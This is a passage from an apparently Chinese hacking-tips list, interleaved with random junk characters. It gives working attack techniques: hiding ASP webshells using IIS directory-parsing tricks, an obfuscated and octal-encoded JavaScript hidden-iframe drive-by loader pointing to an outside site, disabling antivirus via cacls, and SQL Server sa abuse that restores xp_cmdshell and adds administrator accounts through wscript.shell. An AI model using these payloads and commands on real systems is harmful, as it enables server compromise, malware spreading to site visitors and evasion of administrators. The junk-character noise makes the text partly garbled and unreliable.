Q& i0 |% H% o用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。; @0 H. ?# o, h6 V" I% s/ X
6 z( L2 D4 a8 C- M
53、隐藏ASP后门的两种方法: n8 w/ | r/ }; B
1、建立非标准目录:mkdir images..\
4 \* m3 Y2 y& \" e/ T拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
0 V8 _+ D+ ~: J, A2 C; l1 M( K通过web访问ASP木马:http://ip/images../news.asp?action=login$ u1 J! b) B0 d I0 F+ t
如何删除非标准目录:rmdir images..\ /s
+ I1 x1 Y2 |9 B# [2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:, ^2 Z' Y X% h/ L0 F3 g
mkdir programme.asp
; J$ B% B2 m. ~+ @新建1.txt文件内容:<!--#include file=”12.jpg”-->
) x: n+ S' ?. E: o: f, _# i2 |新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件" J7 W7 p; y* R1 Z! d1 |! Z2 E Y9 G$ t
attrib +H +S programme.asp! s$ O4 V6 Z6 ^- `) J/ }
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt& ]# `, g; W5 {, A/ |5 d2 H
0 t( Q, h5 V2 _7 q54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
- x3 U# [+ T& w/ L A4 M" T9 q然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
- Y" R* r7 n9 {' X# b ?3 O4 \3 {
) F% H3 {% R0 i- f# o. O& H& r55、JS隐蔽挂马4 X: _0 ^/ O) X* h1 u& F. O
1.
6 R; k/ K. P: c# u. |var tr4c3="<iframe src=ht";3 H g) R8 N) x' m6 _9 y1 f. Q' [
tr4c3 = tr4c3+"tp:/";. f# P5 u( b$ z4 o, _
tr4c3 = tr4c3+"/ww";
' y+ P, K5 ^! j1 a9 G+ h3 jtr4c3 = tr4c3+"w.tr4";
9 V. P) T4 J Z& C* d' btr4c3 = tr4c3+"c3.com/inc/m";
1 U# V- R$ q! }/ F$ _tr4c3 = tr4c3+"m.htm style="display:none"></i"; M/ P0 A9 [! h+ l
tr4c3 =tr4c3+"frame>'";
7 F6 e X3 S B6 ^0 `$ h/ Hdocument.write(tr4c3);
( ^+ g* H* ~# q) H+ U5 {避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。9 T$ e; l8 L: W7 D V
4 x) C- [3 p7 N
2.8 Q& p& V; Z, [0 l9 o; O7 l& W
转换进制,然后用EVAL执行。如3 i% B% `- \0 `% R9 x+ ?( `; g
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
$ s e, s+ z. q1 ^不过这个有点显眼。4 p$ i& g* Y0 ~. ]7 D1 x9 ], {1 V
3.
9 `0 H. s4 V" ^& Tdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
/ X$ U9 ?2 b) |3 n8 a+ T9 e最后一点,别忘了把文件的时间也修改下。
" y. B- G7 q1 m9 j1 z) A- x3 m% _: `1 t1 w( H' J3 k- V
56.3389终端入侵常用DOS命令9 k* q& I! p9 R3 W
taskkill taskkill /PID 1248 /t
$ B& ?0 h9 `7 q! L1 B9 E& X) R2 a6 ~" P+ h: d
tasklist 查进程
0 n S9 u) T6 p( X) r$ i1 m
! ^7 {7 F# ?7 x4 u. Z3 g: Ucacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; S, @( Q; Y. @3 }! N# F/ C) p# }iisreset /reboot) L9 A6 X+ ?. u. J4 M0 {& r
tsshutdn /reboot /delay:1 重起服务器4 _! ~: S! Z: I C, t# a N7 Y
5 W* M0 h& B8 Flogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
; @6 S: A- [+ l0 f
2 b8 z7 y0 X1 {$ |. m) t" _query user 查看当前终端用户在线情况) o5 Y3 `: W5 z9 D: Y
A* [/ u2 t$ O* b5 c( Q要显示有关所有会话使用的进程的信息,请键入:query process *
, S B7 \8 R6 O; i q; \: ]0 G
$ R- l/ X$ _* [要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, G# G0 n* v$ A; O7 z$ ?5 r" g" V& q0 [
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER24 D: C% c3 c7 P; d9 _) G U9 t
: V: _8 d( g! [, h, _
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
1 |% P+ Z" S% t- m/ }7 G$ s% Y* Y; Y) |( [0 b* Y
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
3 ?+ {0 s$ x( w4 Y6 d' T4 f" `( P+ h2 U# [/ l
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统# c* I8 v2 Y% _( s! T) e
8 k2 c+ J. G2 }8 p. X1 J% i命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
0 Q: z. h% Z3 y- a- t, s2 g2 f i3 O5 n9 S# g
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机! M5 g% g+ T% K; O
. N7 Y% h" p( p7 A2 E+ W
56、在地址栏或按Ctrl+O,输入:
- \4 l7 A, i* A, X& Pjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;% Q8 _* A( T/ u/ c9 V# N
; K8 e; J- j; z: J- O# ?/ C* k6 c源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
# G( U; U+ K& \# L; d/ a
; Q( f) l" q. W% d- A' g: r57、net user的时候,是不能显示加$的用户,但是如果不处理的话,+ G8 X1 }. t' h( u
用net localgroup administrators是可以看到管理组下,加了$的用户的。5 r8 D7 Z+ T! M/ X* V
! H# p) ?$ V6 @7 J/ ]* T
58、 sa弱口令相关命令
9 x( M1 k. n4 U9 U% h; S+ j2 C3 h# ^6 W) Z2 ^
一.更改sa口令方法:
; C' k- K& `, T/ i1 D, ?用sql综合利用工具连接后,执行命令:
! G8 D# z; x9 Q( g8 \+ o. _$ C6 Lexec sp_password NULL,'20001001','sa'
0 ]! F! K F M; v+ \' z5 M(提示:慎用!)
7 ~" K0 w- [% n
) j# b" S! d( s& X8 I& a二.简单修补sa弱口令.1 q+ Z+ ~: v9 A2 v" A: A
4 r R) k9 `' i+ ^: t2 o1 i
方法1:查询分离器连接后执行:
4 k" t8 {. _8 x5 e8 f4 y. Oif exists (select * from
" G+ D1 @0 z7 e" b( ^dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and+ o. P9 a$ z+ a9 {7 w
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
' T5 |5 l4 ]2 n+ L# Y) E
) r3 P: I. g& i1 h! H: G6 V% T8 Dexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'# N+ Z: E; B9 l+ D3 Y
$ c8 x' j* N7 H, d' R( @9 gGO' h* s+ U" R8 c% i8 C
& \+ ?9 g4 z, l! p; x. G6 y然后按F5键命令执行完毕# x; a; i- H- }" b4 M
/ h/ f V( {2 `0 D/ E) U方法2:查询分离器连接后4 e. H+ _$ x5 k" N6 g9 r' e$ a
第一步执行:use master& a3 U1 |( N- Z% Y; g I
第二步执行:sp_dropextendedproc 'xp_cmdshell'
& S2 I: B4 z T# e0 p然后按F5键命令执行完毕! a$ X8 P. ]& p0 s
* n# ^. C' [5 d( Q; u. P2 e! F, a( ^, W
6 T9 a4 V3 E# U" g" U/ J
三.常见情况恢复执行xp_cmdshell. |5 g5 E+ c$ Z- j4 d: `0 P: Y+ h! c
7 x. Z- v" V4 t7 D5 c& `, u: t7 X# B5 a n0 i" R* d
1 未能找到存储过程'master..xpcmdshell'." B1 R5 `5 S, S+ C: v5 S' j
恢复方法:查询分离器连接后,) E5 t0 x8 D- t" z) ^* v t, {
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int+ v; O% F; h! F- l6 K% E
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ M0 A4 n% D2 s; p5 e$ N然后按F5键命令执行完毕
0 S, {7 `# a2 G+ l$ f3 n* E2 u, M) `9 R' b y) T0 V0 f5 \, ^* {
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
3 h/ k3 b/ f0 a( }% q; b恢复方法:查询分离器连接后,3 C) i5 d/ ]( N/ h, {( T
第一步执行:sp_dropextendedproc "xp_cmdshell"; s6 c- p/ F/ Z! q" s
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 @! X" l+ t( Z1 h. e
然后按F5键命令执行完毕! M( O5 H0 P9 y
% z/ c1 Y5 R6 m$ x3 `* O" o* S m3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
4 ]5 |# `) h1 e2 _% z1 Q+ b1 i恢复方法:查询分离器连接后,
% a6 q/ \3 c. o- Y# w. |/ t3 E5 V第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
) T O s, l+ p8 e& M! W第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' . h T( S% U4 |* q
然后按F5键命令执行完毕 ] q L+ g$ l1 Y( I
M! A5 ?4 b; c% i: @" q
四.终极方法.
/ R* a9 G7 ~ k' \如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:+ e8 }. R$ z( H+ z
查询分离器连接后,1 P7 x$ T. R% q8 \" X- h
2000servser系统:
3 T" ?- b4 Z2 w# x7 F8 Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'6 M: T- x( {: ^8 q& N
- p! _- |' D+ }3 r* w
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ L1 J1 G$ _1 Y9 c( q: R, L, _! M. H f! ~5 Z1 g# q6 A. o- n
xp或2003server系统:
: {. I4 S+ q; w% P& ]; N1 r
4 {7 C! A, c( D, O' Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'0 M! E1 v' W5 N; V4 I
4 U* x0 F* M' G8 Z% j
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# Z) S4 C1 l* K |